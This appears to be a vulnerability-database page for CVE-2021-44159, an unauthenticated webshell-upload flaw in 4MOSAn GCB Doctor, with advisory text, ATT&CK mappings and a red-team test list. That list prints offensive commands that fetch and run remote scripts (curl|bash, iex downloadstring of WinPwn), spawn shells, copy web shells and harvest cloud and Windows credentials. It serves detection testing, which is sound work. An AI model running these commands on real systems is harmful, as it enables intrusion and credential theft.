CVE-2021-44159
Overview
The vulnerability is an improper user privilege control in the file upload functionality of 4MOSAn GCB Doctor. This flaw allows unauthenticated remote users to bypass access restrictions and upload arbitrary files, including executable webshells. The affected component is the file upload feature, which lacks adequate validation and authentication mechanisms to restrict file types and user permissions.
Vulnerability Description
4MOSAn GCB Doctor’s file upload function has improper user privilege control. A remote attacker can upload arbitrary files including webshell files without authentication and execute arbitrary code in order to perform arbitrary system operations or deny of service attack.
Impact
An unauthenticated remote attacker can upload and execute arbitrary code on the affected system, allowing full control over the environment. This can lead to unauthorized system operations, data compromise, or denial of service. No user interaction or credentials are required, and the vulnerability is exploitable over the network (AV:N/AC:L/PR:N/UI:N). The high impact on confidentiality, integrity, and availability is reflected in the CVSS score of 9.8.
Solution
According to the advisory published by the Taiwan Computer Emergency Response Team (TW-CERT) at https://www.twcert.org.tw/tw/cp-132-5395-eee40-1.html, users of 4MOSAn GCB Doctor should apply the vendor-provided patches addressing the file upload authentication bypass. The advisory details specific fixed versions and recommends disabling the vulnerable file upload functionality if immediate patching is not feasible. Administrators must follow the vendor's instructions precisely to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the 4MOSAn GCB Doctor’s file upload function arises from improper user privilege control, allowing unauthorized users to upload arbitrary files to the server. This flaw is particularly critical as it does not require authentication, meaning that any remote attacker can exploit this weakness without needing valid credentials. The lack of stringent checks on the file types and content being uploaded enables attackers to introduce malicious files, such as web shells, which can then be executed on the server. This vulnerability highlights a significant oversight in the application's security design, where user permissions and file handling processes are inadequately enforced.
Attack vectors for exploiting this vulnerability are straightforward, given the lack of authentication requirements. An attacker can craft a request to upload a malicious file, bypassing any intended security measures. Once the file is successfully uploaded, the attacker can execute arbitrary code on the server, leading to a range of malicious activities. For instance, they could manipulate the server to perform unauthorized operations, access sensitive data, or even launch denial-of-service attacks by overwhelming the server with requests. The simplicity of the attack process, combined with the high potential for damage, makes this vulnerability particularly appealing to threat actors.
The real-world impact of this vulnerability can be severe, particularly for healthcare organizations relying on the 4MOSAn GCB Doctor application. Successful exploitation can lead to unauthorized access to sensitive patient data, disruption of services, and significant reputational damage. The potential for data breaches not only poses legal and regulatory risks but can also result in financial losses due to remediation efforts and loss of customer trust. Furthermore, the ability to execute arbitrary code opens the door to a wide array of attacks, including ransomware deployment, which could cripple healthcare operations and endanger patient safety.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to conduct thorough security assessments of the application, focusing on file upload functionalities. Employing web application firewalls (WAFs) can help filter out malicious requests and prevent unauthorized file uploads. Additionally, implementing strict file type validation and content scanning can significantly reduce the risk of malicious files being uploaded. Organizations should also enforce robust authentication mechanisms and user role management to ensure that only authorized personnel can perform sensitive actions within the application.
In conclusion, the vulnerability within the 4MOSAn GCB Doctor’s file upload function represents a critical security risk that can be exploited with relative ease. The implications of such an exploit can be devastating for organizations, particularly in the healthcare sector, where data integrity and availability are paramount. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, ensuring the protection of sensitive data and the continuity of essential services.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
4mosan | Gcb Doctor | All |
cpe:2.3:a:4mosan:gcb_doctor:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-44159 |
| twcert.org.tw |
GitHub CVE
x_refsource_MISC
|
https://www.twcert.org.tw/tw/cp-132-5395-eee40-1.html |